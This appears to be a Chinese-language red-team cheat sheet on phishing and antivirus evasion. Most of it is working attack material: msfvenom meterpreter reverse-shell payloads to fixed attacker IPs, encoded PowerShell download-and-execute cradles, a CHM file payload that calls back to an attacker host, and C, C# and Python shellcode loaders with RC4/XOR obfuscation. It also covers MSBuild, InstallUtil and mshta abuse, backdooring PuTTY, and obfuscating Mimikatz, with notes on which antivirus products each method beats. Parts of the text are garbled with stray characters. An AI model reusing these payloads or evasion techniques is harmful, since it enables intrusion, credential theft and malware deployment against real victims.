#macchanger –m xx:xx:xx:xx:xx:xx wlan1#macchanger –r wlan1
BadUSB
克隆卡
藍牙
魚叉式攻擊
釣魚郵件
假冒的內部域名假冒的外部域名近似域名被黑賬戶群發/特定發虛構情景/惡意連接/惡意文件
CVE
CVE-2017-11882
Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016
CVE-2017-0199
Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016,Vista SP2,Server 2008 SP2,Windows 7 SP1,Windows 8.1
CVE-2012-0158
Microsoft Office 2003 SP3����、2007 SP2和SP3,以及2010 Gold和SP1;Office 2003 Web組件SP3;SQL Server 2000 SP4�、2005 SP4和2008 SP2,SP3和R2; BizTalk Server 2002 SP1;Commerce Server 2002 SP4�、2007 SP2和2009 Gold和R2; Visual FoxPro 8.0 SP1和9.0 SP2; 和Visual Basic 6.0
CVE-2017-0143
Microsoft Windows Vista SP2;Windows Server 2008 SP2和R2 SP1; Windows 7 SP1;Windows 8.1; Windows Server 2012 Gold和R2;Windows RT 8.1;Windows 10 Gold,1511和1607;以及 和Windows Server 2016OFFICE文檔/ PDF文件
可執行文件
文檔文件的偽造
擴展名/圖標
捆綁
宏
0day
CHM
使用編譯的HTML文件加載惡意代碼�����。使用EasyCHM對html進行編譯,在html文件中插入惡意代碼���。使用MSF生成powershell格式的web_delivery模塊使用Rundll32配合MyJSRAT實施運行無彈窗
把命令base編碼避免特殊符號
執行語句編碼后>powershell -ep bypass -enc JABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAQgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAKACQAQgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoASQBFAFgAIAAkAEIALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADAANwA6ADgAMAA4ADAALwBQAEsAUQBOAEUAYgAnACkAOwAKAA==通過JSRat執行powershell上線命令https://github.com/Ridter/MyJSRat>python MyJSRat.py -i 192.168.1.107 -p 8888 -c "powershell -ep bypass -enc JABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAQgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAKACQAQgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoASQBFAFgAIAAkAEIALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADAANwA6ADgAMAA4ADAALwBQAEsAUQBOAEUAYgAnACkAOwAKAA=="
訪問http://ip/wtf復制利用語句到html文件后編譯
<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.0.107:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
正常打開CHM文件,無彈窗上線�����。
釣魚鏈接
URL跳轉
結合惡意文檔或程序
短URL
結合水坑攻擊
相似域名
域名竊取
第三方服務魚叉
通過社交軟件建立關系,如男女朋友,師父徒弟,HR,尋求業務等進行釣魚攻擊
免殺
MSF免殺
nps_payload
>python nps_payload.py正常生成>msfconsole -r msbuild_nps.rc開啟監聽>%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe xx.xml>wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml正常執行結束進程msbuild會失去會話,以下保存bat執行獲得session后立刻遷移進程@echo offecho [*] Please Wait, preparing software ..C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\xxx.xmlexit
編碼器
>set EnableStageEncoding true>set stageencoder x86/fnstenv_mov 編碼進行免殺>set stageencodingfallback false&>msfvenom --list encoders列出編碼器
c/c++源碼免殺
>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f c -o 1.c-i編碼20次MSF監聽需設置自動遷移進程set autorunscript migrate -n explorer.exe
指針執行
unsigned char buf[] ="shellcode";#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制臺程序不出黑窗口main(){ ( (void(*)(void))&buf)();}使用vc6.0組建編譯后在靶機執行
當前過不了火絨,360動態靜態可過
申請動態內存
#include <Windows.h>#include <stdio.h>#include <string.h>#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制臺程序不出黑窗口unsigned char buf[] ="shellcode";main(){ char *Memory; Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(Memory, buf, sizeof(buf)); ((void(*)())Memory)();}
嵌入匯編
#include <windows.h>#include <stdio.h>#pragma comment(linker, "/section:.data,RWE")unsigned char shellcode[] ="";void main(){ __asm { mov eax, offset shellcode jmp eax }}
強制類型轉換
#include <windows.h>#include <stdio.h>unsigned char buf[] ="";void main(){ ((void(WINAPI*)(void))&buf)();}
匯編花指令
#include <windows.h>#include <stdio.h>#pragma comment(linker, "/section:.data,RWE")unsigned char shellcode[] ="";void main(){ __asm { mov eax, offset shellcode _emit 0xFF _emit 0xE0 }}
XOR加密
https://github.com/Arno0x/ShellcodeWrapper安裝生成raw格式木馬>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f raw -o shell.raw
加密> python shellcode_encoder.py -cpp -cs -py shell.raw thisiskey xor生成的py文件使用py2exe編譯執行生成的cs文件使用csc.exe編譯執行生成的cpp文件使用vc6.0編譯,去掉預編譯頭編譯執行
遠程線程注入
目前過火絨,不過360,可組合一下Vs新建c++控制臺程序右鍵屬性-》將MFC的使用選為在靜態庫中使用MFC生成c格式shellcode粘貼進remote inject.cpp
生成項目能成功上線,并開啟calc進程
加載器免殺
shellcode_launcher
https://github.com/clinicallyinane/shellcode_launcher/生成payload(raw)>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f raw -o shellcode.raw加載器加載>shellcode_launcher.exe -i shellcode.raw
SSI加載
https://github.com/DimopoulosElias/SimpleShellcodeInjector生成payload(c)>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f c -o shellcode.c執行>cat shellcode.c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"http://g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
MSF監聽可使用minGW自行編譯>gcc SimpleShellcodeInjector.c -o xxx.exe執行>xxx.exe +生成的編碼
c#源碼免殺
直接編譯
生成payloadMSF監聽需設置自動遷移進程set autorunscript migrate -n explorer.exe>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txtMSF啟動監聽Payload粘貼到位置using System;using System.Runtime.InteropServices;namespace TCPMeterpreterProcess{ class Program { static void Main(string[] args) { byte[] shellcode = new byte[] {payload here}; UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; // prepare data IntPtr pinfo = IntPtr.Zero; // execute native code hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); } private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32")] private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType); [DllImport("kernel32")] private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId ); [DllImport("kernel32")] private static extern bool CloseHandle(IntPtr handle); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds ); [DllImport("kernel32")] private static extern IntPtr GetModuleHandle( string moduleName ); [DllImport("kernel32")] private static extern UInt32 GetProcAddress( IntPtr hModule, string procName ); [DllImport("kernel32")] private static extern UInt32 LoadLibrary( string lpFileName ); [DllImport("kernel32")] private static extern UInt32 GetLastError(); }}Visual studio創建C#.net framework控制臺程序編譯可過殺軟
加密處理
生成payloadMSF監聽需設置自動遷移進程set autorunscript migrate -n explorer.exe>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt粘貼payload后編譯加密using System;using System.Collections.Generic;using System.IO;using System.Linq;using System.Security.Cryptography;using System.Text;using System.Threading.Tasks;using System.Reflection;using System.Runtime.CompilerServices;using System.Runtime.InteropServices;namespace Payload_Encrypt_Maker{ class Program { // 加密密鑰,可以更改,加解密源碼中保持KEY一致就行 static byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 }; static byte[] IV = { 0x00, 0xcc, 0x00, 0x00, 0x00, 0xcc }; static byte[] payload = { payload here }; // 替換成MSF生成的shellcode private static class Encryption_Class { public static string Encrypt(string key, string data) { Encoding unicode = Encoding.Unicode; return Convert.ToBase64String(Encrypt(unicode.GetBytes(key), unicode.GetBytes(data))); } public static byte[] Encrypt(byte[] key, byte[] data) { return EncryptOutput(key, data).ToArray(); } private static byte[] EncryptInitalize(byte[] key) { byte[] s = Enumerable.Range(0, 256) .select(i => (byte)i) .ToArray(); for (int i = 0, j = 0; i < 256; i++) { j = (j + key[i % key.Length] + s[i]) & 255; Swap(s, i, j); } return s; } private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data) { byte[] s = EncryptInitalize(key); int i = 0; int j = 0; return data.select((b) => { i = (i + 1) & 255; j = (j + s[i]) & 255; Swap(s, i, j); return (byte)(b ^ s[(s[i] + s[j]) & 255]); }); } private static void Swap(byte[] s, int i, int j) { byte c = s[i]; s[i] = s[j]; s[j] = c; } } static void Main(string[] args) { byte[] result = Encryption_Class.Encrypt(KEY, payload); int b = 0; for (int i = 0; i < result.Length; i++) { b++; if (i == result.Length + 1) { Console.Write(result[i].ToString()); } if (i != result.Length) { Console.Write(result[i].ToString() + ","); } } } }}
編譯解密using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Runtime.InteropServices;using System.Threading;using System.Reflection;using System.Runtime.CompilerServices;namespace NativePayload_Reverse_tcp{ public class Program{ public static void Main() { Shellcode.exec(); }}class Shellcode{ public static void exec() { string Payload_Encrypted; Payload_Encrypted = "payload here"; string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(','); byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length]; for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++) { byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString()); _X_to_Bytes[i] = current; } // 解密密鑰,可以更改,加解密源碼中保持KEY一致就行 byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 }; byte[] MsfPayload = Decrypt(KEY, _X_to_Bytes); // 加載shellcode IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40); Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length); CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0); Thread.Sleep(2000); } public static byte[] Decrypt(byte[] key, byte[] data) { return EncryptOutput(key, data).ToArray(); } private static byte[] EncryptInitalize(byte[] key) { byte[] s = Enumerable.Range(0, 256) .select(i => (byte)i) .ToArray(); for (int i = 0, j = 0; i < 256; i++) { j = (j + key[i % key.Length] + s[i]) & 255; Swap(s, i, j); } return s; } private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data) { byte[] s = EncryptInitalize(key); int i = 0; int j = 0; return data.select((b) => { i = (i + 1) & 255; j = (j + s[i]) & 255; Swap(s, i, j); return (byte)(b ^ s[(s[i] + s[j]) & 255]); }); } private static void Swap(byte[] s, int i, int j) { byte c = s[i]; s[i] = s[j]; s[j] = c; } [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); }}
XOR/AES編碼
與上文xor加密類似
CSC+InstallUtil
生成payloadMSF監聽需設置自動遷移進程set autorunscript migrate -n explorer.exe>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txtPayload粘貼到InstallUtil-Shellcode.cs中使用csc編譯
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\Users\y\Desktop\shell.exe C:\Users\y\Desktop\InstallUtil-ShellCode.cs
執行C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe
Python源碼免殺
pyinstaller加載C代碼編譯
生成C格式payloadMSF監聽需設置自動遷移進程set autorunscript migrate -n explorer.exe>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c粘貼shellcode到shellcode+c.py中,在32位系統上安裝python����、py2exe�、pyinstaller進入C:\Python27\Scripts目錄使用命令把py打包為exe>python pyinstaller-script.py -F -w shellcode.py會在目錄下生成dist文件夾,exe文件就在里面
pyinstaller加載py代碼編譯(*)
生成py格式payloadMSF監聽需設置自動遷移進程set autorunscript migrate -n explorer.exe>msfvenom -p windows/meterpreter/reverse_tcp LPORT=12138 LHOST=192.168.0.108 -e x86/shikata_ga_nai -i 11 -f py -o /var/www/html/1.py粘貼shellcode到shellcode+py.py中,在32位系統上安裝python����、py2exe���、pyinstaller進入C:\Python27\Scripts目錄使用命令把py打包為exe>python pyinstaller-script.py --console --onefile shellcode.py會在目錄下生成dist文件夾,exe文件就在里面
Py2exe打包exe
生成raw格式payloadMSF監聽需設置自動遷移進程set autorunscript migrate -n explorer.exe>msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/shell.py在32位系統上安裝python�、py2exe創建setup.py放置同一目錄
from distutils.core import setupimport py2exesetup(name = "Meter",description = "Python-based App",version = "1.0",console = ["shell.py"],options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},zipfile = None)執行打包命令>python setup.py py2exe會在當前目錄生成dist文件夾,打包好的exe在里面
Base64編碼+Pyinstaller打包
MSF監聽需設置自動遷移進程set autorunscript migrate -n explorer.exe>msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.cShellcode粘貼在shellcode+base64+c.py中>python pyinstaller-script.py -F -w shellcode.py會在目錄下生成dist文件夾,exe文件就在里面
加載器分離
hex
生成c格式payload>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c下載k8final
粘貼shellcode進去
使用https://github.com/k8gege/scrun
或>python scrun.py xxx或編譯ScRunHex.py為exe
Base64(*)
生成c格式payload>msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c下載k8final
粘貼shellcode進去
進行hex編碼后,粘貼進去base64編碼
看系統位數編譯ScRunBase.py文件,使用pyinstaller打包為exe后執行https://gitee.com/RichChigga/scrun/blob/master/ScRunBase64.py>python pyinstaller-script.py -F -w ScRunBase64.py
DLL劫持
白dll劫持Processmonitor查找程序加載的dll使用stud_pe加載dll進去或生成payload免殺好粘貼進去,查看目標上有什么軟件,本地查找可劫持的dll,劫持好文件后傳上去�。
MSBuild
鏈接https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f csharp遠程執行>wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml要設置自動遷移進程
GreatSCT
>use Bypass>list>use regasm/meterpreter/rev_tcp.py>msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
Mshta
https://github.com/mdsecactivebreach/CACTUSTORCH/blob/master/CACTUSTORCH.hta生成>msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.bin>cat 1.bin |base64 -w 0
編碼后的內容復制到
執行>mshta http://192.168.0.106:1222/1.hta360執行檢測出來,靜態動態無法檢測���、火絨無法檢測
InstallUtil
內網文章中有介紹
Veil
>use 1選擇evasion模塊>list查看可用payload>use 7 選擇c格式的payload>set LHOST/LPORT設置回連IP和端口>generate生成
直接生成的exe可能會被查殺,目前可過360,不能過火絨使用minGW-w64編譯C文件>gcc -o vel.exe veil.c -l ws2_32
RC4
>msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 lhost=192.168.0.108 lport=3333 RC4PASSWORD=123qwe!@# -f c
捆綁
>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -x PsExec64.exe -i 15 -f exe -o /var/www/html/payload4.exe
Evasion模塊
>show evasion
Phantom-Evasion
Shellter
僅支持32位程序>apt install shellter指定一個exe文件
選擇payload
the-backdoor-factory
查看是否支持捆綁>python backdoor.py -f /root/Desktop/putty.exe -S查看此文件支持哪些payload>python backdoor.py -f /root/Desktop/putty.exe -s showreverse_shell_tcp_inline對應msfset payload windows/meterpreter/reverse_tcpmeterpreter_reverse_https_threaded應msfset payload windows/meterpreter/reverse_httpsiat_reverse_tcp_stager_threaded修復IATuser_supplied_shellcode_threaded自定義payload參數-s 指定payload-H 回連地址-P 回連端口-J 多代碼裂縫注入>python backdoor.py -f ~/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.0.108 -P 12138 -J -o payload.exe后門生成在backdoored目錄或生成payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c自定義>python backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c -o payload2.exe
zirikatu
hanzoInjection
https://github.com/P0cL4bs/hanzoInjection生成>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f raw -o /var/www/html/1.bin>HanzoInjection.exe -p 1.bin -o 1.cs編譯1.cs屬性-生成-允許不安全代碼
PowerShell免殺
直接生成
>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.0.108 lport=12138 -f psh -o /var/www/html/1.ps1執行>powershell -ep bypass -noexit -file 1.ps1Powershell行為檢測bypass>powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.replace('123','adString');IEX ($c1+$c2)"
Invoke-Shellcode加載
生成code>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f powershell -o /var/www/html/1.ps1目標執行> powershell -ep bypass> IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/powersploit/CodeExecution/Invoke-Shellcode.ps1')> IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/1.ps1')> Invoke-Shellcode -Shellcode ($buf) -Force
防護軟件沒反應
Invoke-Obfuscation
https://github.com/danielbohannon/Invoke-Obfuscation生成code>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f psh -o /var/www/html/1.ps1>powershell -ep bypass>Import-Module .\Invoke-Obfuscation.psd1>Invoke-Obfuscation>set scriptpath C:\Users\y\Desktop\1.ps1>encoding>3 指定編碼方式>out C:\Users\y\Desktop\ok.ps1 保存
執行>powershell -ep bypass -noexit -file ok.ps1
Xencrypt
https://github.com/the-xentropy/xencrypt/blob/master/xencrypt.ps1>Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -outfile xenmimi.ps1 -Iterations 100 遞歸分層躲避動態查殺
>Invoke-Xencrypt -infile .\Invoke-Mimikatz.ps1 -outfile mimi.ps1
PyFuscation
https://github.com/CBHue/PyFuscation對函數,參數,變量進行混淆>python3 PyFuscation.py -fvp --ps Invoke-Mimikatz.ps1
拆分+C編譯
#include<stdio.h>#include<stdlib.h>int main(){system("powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)");return 0;}
行為檢測
>powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
Out-EncryptedScript
http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1>Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password shabiisme -Salt 123456
PS > IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1")PS > [String] $cmd = Get-Content .\evil.ps1PS > Invoke-Expression $cmdPS > $decrypted = de shabiisme 123456PS > Invoke-Expression $decryptedPS > Invoke-Mimikatz
cobalt strike powershell免殺
From: https://y4er.com/post/cobalt-strike-powershell-bypass/powershell>$string = ''powershell>$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('[cs生成的shellcode]')powershell>$s |foreach { $string = $string + $_.ToString()+','}powershell>$string>c:\1.txt修改ps腳本[Byte[]]$var_code = [Byte[]](payload)再混淆一下函數和變量繞過執行命令的攔截使用cs的參數欺騙beacon > argue cmd.exe blablabla
分塊免殺
生成msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.0.108 LPORT=443 -f psh-net -o shity_shellcode.ps1
先來測試一下,把ps1文件的shellcode換成一段無害的字符串
結果發現還是被查殺了
這表明大多數檢測來自PowerShell模板,而不是Shellcode本身�。下面幾種bypass方法1.將字符串分成幾部分并創建中間變量;2.添加大量垃圾備注;3.添加一些垃圾指令,例如循環或睡眠指令(對于沙盒有用)�����。[DllImport("kernel32.dll")]變為[DllImport("ke"+"rne"+"l32.dll")] #可繞過賽門鐵克$przdE.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location))變為$magic="Syst"+"em"+".dll";$przdE.ReferencedAssemblies.AddRange(@($magic,[PsObject].Assembly.Location))分割shellcode$sc0=<shellcode的第1部分>; …$sc7=<shellcode的第8部分>; [Byte[]]$tcomplete_sc=[System.Convert]::FromBase64String($sc0+$sc1+…+$sc7)一些細節可參照https://raw.githubusercontent.com/kmkz/Pentesting/master/AV_Evasion/AV_Bypass.ps1我不太懂匯編語言,所以沒有添加無害指令����。這里直接使用一鍵生成的bash腳本,有時間的可以讀讀里面的命令https://github.com/darksh3llRU/tools/blob/master/psh-net_shellcode_fastchange.sh這個腳本是生成個hta的,腳本以1337個字符來分塊
我測試的時候1337個字符會被賽門鐵克查殺到,我這里修改成250個字符來分塊
因為我沒加匯編指令,中間這里直接按任意鍵跳過即可,懂的可以在開頭添加一些指令,例如xor,inc,dec,add,sub,mov,nop等
執行完后會生成一些文件
我們只用final_pshnet_revhttps.ps1這個文件,打開修改一下
修改成
Ruby
目標機器裝有ruby時生成>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f ruby粘貼到ruby中
執行>ruby xx.ruby
Golang
生成>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c代碼轉換成0x格式,粘貼到go.txt中保存為go格式
安裝golang環境在shellcode目錄執行>go build生成exe
加載器
go-shellcode
https://github.com/brimstone/go-shellcode進入cmd/sc目錄編譯sc.exe>go build
生成>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f hex -o shell.txt加載器加載shellcode>sc.exe shellcode
Gsl
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip>gsl -s SHELLCODE -hex msf生成hex格式>gsl -f shell.raw本地加載raw格式文件>gsl -f shell.hex -hex 本地加載hex格式文件>gsl -u http://192.168.0.108/1.raw 遠程加載>gsl -u http://192.168.0.108/1.hex
內網&域
Powershell
查看版本$PSVersionTable
遠程執行
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('');Invoke-xxx"
加載exe
msfvenom生成exe木馬#msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f exe > /var/www/html/1.exe 使用powersploit的Invoke-ReflectivePEInjection.ps1腳本#powershell.exe -w hidden -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/clymberps/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://192.168.0.107/1.exe -ForceASLR"
EXE2PS1
http://192.168.0.107/ps/powersploit/CodeExecution/Convert-BinaryToString.ps1將exe轉換為base64>Import-Module .\Convert-BinaryToString.ps1>Convert-BinaryToString -FilePath .\ms15051.exe
http://192.168.0.107/ps/powersploit/CodeExecution/Invoke-ReflectivePEInjection.ps1Invoke-ReflectivePEInjection.ps1文件頭部添加Function MS15051{<#.SYNOPSIS .EXAMPLEC:\PS> MS15051 -Command "whoami"#> [CmdletBinding()] param( [Parameter(Mandatory = $False)] [string] $Command )$InputString = "文件的base64編碼"$PEBytes = [System.Convert]::FromBase64String($InputString)文件尾部添加write-host ("[+] Executing Command: "+$Command) -foregroundcolor "Green"Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs $Commandwrite-host ("[+] Done !") -foregroundcolor "Green"}
遠程下載執行>powershell -nop -w hidden -ep bypass "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.0.107/ps/powersploit/CodeExecution/ms15051.ps1'); MS15051 –Command \"whoami\""
繞過策略
>powershell Set-ExecutionPolicy Unrestricted需管理員權限,不受限執行>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/Invoke-xxx.ps1');invoke-xxx">powershell -exec bypass -File ./a.ps1&>Import-Module xxx
Base64
>use exploit/multi/script/web_delivery|target=2(PSH)&>cat payload.txt | iconv --to-code UTF-16LE |base64>powershell -ep bypass -enc base64code
寫入bat繞過
powershell -exec bypass -File ./a.ps1將該命令保存為c.bat
拼接拆分字符串
